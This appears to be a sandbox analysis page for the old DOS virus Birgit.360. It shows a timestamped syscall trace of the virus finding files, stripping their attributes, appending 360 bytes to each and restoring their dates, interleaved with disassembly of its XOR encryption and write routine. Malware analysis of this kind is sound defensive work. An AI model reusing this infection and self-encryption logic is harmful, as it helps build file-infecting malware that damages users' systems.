Sample viewer

vx.netlux.org/Virus.DOS.Birgit.360

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:01:46.168598396Z 53 PC: 12aa7 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:01:46.171112531Z 37 PC: 12ab7 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:01:46.185896053Z 71 PC: 12ac0 | Get current directory
2018-12-17T22:01:46.188875418Z 53 PC: 12ac7 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:01:46.190743487Z 37 PC: 12ad0 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:01:46.191932333Z 78 PC: 12b01 | Find first file
2018-12-17T22:01:46.19793251Z 67 PC: 12b1e | Get or set file attributes
2018-12-17T22:01:46.203799003Z 67 PC: 12b28 | Get or set file attributes
2018-12-17T22:01:46.435153375Z 61 PC: 12b2c | Open file (Filename = '')
2018-12-17T22:01:46.448253086Z 87 PC: 12b31 | Get or set file date and time
2018-12-17T22:01:46.450038058Z 63 PC: 12b3c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:01:46.457091145Z 66 PC: 12b4b | Move file pointer
2018-12-17T22:01:46.458794204Z 44 PC: 12a50 | Get time 0x12a50: cmp dl, 0
0x12a53: je 0x12a4c
0x12a55: mov byte ptr [0x10a], dl
0x12a59: call 0x12a6e
0x12a5c: pop bx
0x12a5d: mov cx, 0x168
0x12a60: mov dx, 0x100
0x12a63: mov ah, 0x40
0x12a65: int3
0x12a66: inc byte ptr [0x268]
0x12a6a: call 0x12a6e
0x12a6d: ret
0x12a6e: mov bx, 0x146
0x12a71: mov al, byte ptr [0x10a]
0x12a75: cmp al, 0
0x12a77: je 0x12a85
0x12a79: xor byte ptr [bx], al
0x12a7c: inc bx
0x12a7d: add al, bh
0x12a7f: cmp bx, 0x242
2018-12-17T22:01:46.461420489Z 64 PC: 12a66 | Write file or device (Write 360 bytes on handle 5)
2018-12-17T22:01:46.465362435Z 87 PC: 12b56 | Get or set file date and time
2018-12-17T22:01:46.467736244Z 62 PC: 12b59 | Close file
2018-12-17T22:01:46.478199275Z 67 PC: 12b64 | Get or set file attributes
2018-12-17T22:01:46.488455972Z 79 PC: 12b01 | Find next file
2018-12-17T22:01:46.491355385Z 67 PC: 12b1e | Get or set file attributes
2018-12-17T22:01:46.497028721Z 67 PC: 12b28 | Get or set file attributes
2018-12-17T22:01:46.508054043Z 61 PC: 12b2c | Open file (Filename = '')
2018-12-17T22:01:46.52157949Z 87 PC: 12b31 | Get or set file date and time
2018-12-17T22:01:46.523648374Z 63 PC: 12b3c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:01:46.530787517Z 66 PC: 12b4b | Move file pointer
2018-12-17T22:01:46.53214786Z 44 PC: 12a50 | Get time 0x12a50: cmp dl, 0
0x12a53: je 0x12a4c
0x12a55: mov byte ptr [0x10a], dl
0x12a59: call 0x12a6e
0x12a5c: pop bx
0x12a5d: mov cx, 0x168
0x12a60: mov dx, 0x100
0x12a63: mov ah, 0x40
0x12a65: int3
0x12a66: inc byte ptr [0x268]
0x12a6a: call 0x12a6e
0x12a6d: ret
0x12a6e: mov bx, 0x146
0x12a71: mov al, byte ptr [0x10a]
0x12a75: cmp al, 0
0x12a77: je 0x12a85
0x12a79: xor byte ptr [bx], al
0x12a7c: inc bx
0x12a7d: add al, bh
0x12a7f: cmp bx, 0x242
2018-12-17T22:01:46.534654814Z 64 PC: 12a66 | Write file or device (Write 360 bytes on handle 5)
2018-12-17T22:01:46.538057354Z 87 PC: 12b56 | Get or set file date and time
2018-12-17T22:01:46.539965523Z 62 PC: 12b59 | Close file
2018-12-17T22:01:46.547983022Z 67 PC: 12b64 | Get or set file attributes
2018-12-17T22:01:46.55816555Z 79 PC: 12b01 | Find next file
2018-12-17T22:01:46.564727227Z 67 PC: 12b1e | Get or set file attributes
2018-12-17T22:01:46.570729634Z 67 PC: 12b28 | Get or set file attributes
2018-12-17T22:01:46.581648706Z 61 PC: 12b2c | Open file (Filename = '')
2018-12-17T22:01:46.589379793Z 87 PC: 12b31 | Get or set file date and time
2018-12-17T22:01:46.591045626Z 63 PC: 12b3c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:01:46.597666654Z 66 PC: 12b4b | Move file pointer
2018-12-17T22:01:46.600456759Z 44 PC: 12a50 | Get time 0x12a50: cmp dl, 0
0x12a53: je 0x12a4c
0x12a55: mov byte ptr [0x10a], dl
0x12a59: call 0x12a6e
0x12a5c: pop bx
0x12a5d: mov cx, 0x168
0x12a60: mov dx, 0x100
0x12a63: mov ah, 0x40
0x12a65: int3
0x12a66: inc byte ptr [0x268]
0x12a6a: call 0x12a6e
0x12a6d: ret
0x12a6e: mov bx, 0x146
0x12a71: mov al, byte ptr [0x10a]
0x12a75: cmp al, 0
0x12a77: je 0x12a85
0x12a79: xor byte ptr [bx], al
0x12a7c: inc bx
0x12a7d: add al, bh
0x12a7f: cmp bx, 0x242
2018-12-17T22:01:46.603238885Z 64 PC: 12a66 | Write file or device (Write 360 bytes on handle 5)
2018-12-17T22:01:46.606492035Z 87 PC: 12b56 | Get or set file date and time
2018-12-17T22:01:46.620042994Z 62 PC: 12b59 | Close file
2018-12-17T22:01:46.627511383Z 67 PC: 12b64 | Get or set file attributes
2018-12-17T22:01:46.637518775Z 79 PC: 12b01 | Find next file
2018-12-17T22:01:46.641074528Z 67 PC: 12b1e | Get or set file attributes
2018-12-17T22:01:46.646726783Z 67 PC: 12b28 | Get or set file attributes
2018-12-17T22:01:46.662429442Z 61 PC: 12b2c | Open file (Filename = '')
2018-12-17T22:01:46.670491002Z 87 PC: 12b31 | Get or set file date and time
2018-12-17T22:01:46.672588364Z 63 PC: 12b3c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:01:46.678963388Z 66 PC: 12b4b | Move file pointer
2018-12-17T22:01:46.6805226Z 44 PC: 12a50 | Get time 0x12a50: cmp dl, 0
0x12a53: je 0x12a4c
0x12a55: mov byte ptr [0x10a], dl
0x12a59: call 0x12a6e
0x12a5c: pop bx
0x12a5d: mov cx, 0x168
0x12a60: mov dx, 0x100
0x12a63: mov ah, 0x40
0x12a65: int3
0x12a66: inc byte ptr [0x268]
0x12a6a: call 0x12a6e
0x12a6d: ret
0x12a6e: mov bx, 0x146
0x12a71: mov al, byte ptr [0x10a]
0x12a75: cmp al, 0
0x12a77: je 0x12a85
0x12a79: xor byte ptr [bx], al
0x12a7c: inc bx
0x12a7d: add al, bh
0x12a7f: cmp bx, 0x242
2018-12-17T22:01:46.683081706Z 64 PC: 12a66 | Write file or device (Write 360 bytes on handle 5)
2018-12-17T22:01:46.686133382Z 87 PC: 12b56 | Get or set file date and time
2018-12-17T22:01:46.687953311Z 62 PC: 12b59 | Close file
2018-12-17T22:01:46.695857492Z 67 PC: 12b64 | Get or set file attributes
2018-12-17T22:01:46.705447562Z 79 PC: 12b01 | Find next file
2018-12-17T22:01:46.7079385Z 67 PC: 12b1e | Get or set file attributes
2018-12-17T22:01:46.713481548Z 67 PC: 12b28 | Get or set file attributes
2018-12-17T22:01:46.723405291Z 61 PC: 12b2c | Open file (Filename = '')
2018-12-17T22:01:46.729921695Z 87 PC: 12b31 | Get or set file date and time
2018-12-17T22:01:46.732246477Z 63 PC: 12b3c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:01:46.738580805Z 66 PC: 12b4b | Move file pointer
2018-12-17T22:01:46.740289189Z 44 PC: 12a50 | Get time 0x12a50: cmp dl, 0
0x12a53: je 0x12a4c
0x12a55: mov byte ptr [0x10a], dl
0x12a59: call 0x12a6e
0x12a5c: pop bx
0x12a5d: mov cx, 0x168
0x12a60: mov dx, 0x100
0x12a63: mov ah, 0x40
0x12a65: int3
0x12a66: inc byte ptr [0x268]
0x12a6a: call 0x12a6e
0x12a6d: ret
0x12a6e: mov bx, 0x146
0x12a71: mov al, byte ptr [0x10a]
0x12a75: cmp al, 0
0x12a77: je 0x12a85
0x12a79: xor byte ptr [bx], al
0x12a7c: inc bx
0x12a7d: add al, bh
0x12a7f: cmp bx, 0x242
2018-12-17T22:01:46.743458921Z 64 PC: 12a66 | Write file or device (Write 360 bytes on handle 5)
2018-12-17T22:01:46.746220563Z 87 PC: 12b56 | Get or set file date and time
2018-12-17T22:01:46.747725872Z 62 PC: 12b59 | Close file
2018-12-17T22:01:46.912518441Z 67 PC: 12b64 | Get or set file attributes
2018-12-17T22:01:47.065926159Z 79 PC: 12b01 | Find next file
2018-12-17T22:01:47.068565266Z 67 PC: 12b1e | Get or set file attributes
2018-12-17T22:01:47.074915188Z 67 PC: 12b28 | Get or set file attributes
2018-12-17T22:01:47.083531544Z 61 PC: 12b2c | Open file (Filename = '')
2018-12-17T22:01:47.091111173Z 87 PC: 12b31 | Get or set file date and time
2018-12-17T22:01:47.09269415Z 63 PC: 12b3c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:01:47.097120003Z 66 PC: 12b4b | Move file pointer
2018-12-17T22:01:47.098155263Z 44 PC: 12a50 | Get time 0x12a50: cmp dl, 0
0x12a53: je 0x12a4c
0x12a55: mov byte ptr [0x10a], dl
0x12a59: call 0x12a6e
0x12a5c: pop bx
0x12a5d: mov cx, 0x168
0x12a60: mov dx, 0x100
0x12a63: mov ah, 0x40
0x12a65: int3
0x12a66: inc byte ptr [0x268]
0x12a6a: call 0x12a6e
0x12a6d: ret
0x12a6e: mov bx, 0x146
0x12a71: mov al, byte ptr [0x10a]
0x12a75: cmp al, 0
0x12a77: je 0x12a85
0x12a79: xor byte ptr [bx], al
0x12a7c: inc bx
0x12a7d: add al, bh
0x12a7f: cmp bx, 0x242
2018-12-17T22:01:47.100129141Z 64 PC: 12a66 | Write file or device (Write 360 bytes on handle 5)
2018-12-17T22:01:47.102332065Z 87 PC: 12b56 | Get or set file date and time
2018-12-17T22:01:47.103413024Z 62 PC: 12b59 | Close file
2018-12-17T22:01:47.110987785Z 67 PC: 12b64 | Get or set file attributes
2018-12-17T22:01:47.120521721Z 79 PC: 12b01 | Find next file
2018-12-17T22:01:47.123049373Z 67 PC: 12b1e | Get or set file attributes
2018-12-17T22:01:47.12901524Z 67 PC: 12b28 | Get or set file attributes
2018-12-17T22:01:47.141396672Z 61 PC: 12b2c | Open file (Filename = '')
2018-12-17T22:01:47.156987934Z 87 PC: 12b31 | Get or set file date and time
2018-12-17T22:01:47.159624342Z 63 PC: 12b3c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:01:47.166636561Z 66 PC: 12b4b | Move file pointer
2018-12-17T22:01:47.168032138Z 44 PC: 12a50 | Get time 0x12a50: cmp dl, 0
0x12a53: je 0x12a4c
0x12a55: mov byte ptr [0x10a], dl
0x12a59: call 0x12a6e
0x12a5c: pop bx
0x12a5d: mov cx, 0x168
0x12a60: mov dx, 0x100
0x12a63: mov ah, 0x40
0x12a65: int3
0x12a66: inc byte ptr [0x268]
0x12a6a: call 0x12a6e
0x12a6d: ret
0x12a6e: mov bx, 0x146
0x12a71: mov al, byte ptr [0x10a]
0x12a75: cmp al, 0
0x12a77: je 0x12a85
0x12a79: xor byte ptr [bx], al
0x12a7c: inc bx
0x12a7d: add al, bh
0x12a7f: cmp bx, 0x242
2018-12-17T22:01:47.171238078Z 64 PC: 12a66 | Write file or device (Write 360 bytes on handle 5)
2018-12-17T22:01:47.174512017Z 87 PC: 12b56 | Get or set file date and time
2018-12-17T22:01:47.176252026Z 62 PC: 12b59 | Close file
2018-12-17T22:01:47.183704282Z 67 PC: 12b64 | Get or set file attributes
2018-12-17T22:01:47.194195721Z 79 PC: 12b01 | Find next file
2018-12-17T22:01:47.197006029Z 67 PC: 12b1e | Get or set file attributes
2018-12-17T22:01:47.20295866Z 67 PC: 12b28 | Get or set file attributes
2018-12-17T22:01:47.213407078Z 61 PC: 12b2c | Open file (Filename = '')
2018-12-17T22:01:47.224687803Z 87 PC: 12b31 | Get or set file date and time
2018-12-17T22:01:47.226421703Z 63 PC: 12b3c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:01:47.234558846Z 62 PC: 12b59 | Close file
2018-12-17T22:01:47.236292211Z 67 PC: 12b64 | Get or set file attributes
2018-12-17T22:01:47.246068905Z 79 PC: 12b01 | Find next file
2018-12-17T22:01:47.249006918Z 59 PC: 12ae5 | Change current directory
2018-12-17T22:01:47.253008432Z 59 PC: 12aed | Change current directory
2018-12-17T22:01:47.254639112Z 37 PC: 12af9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')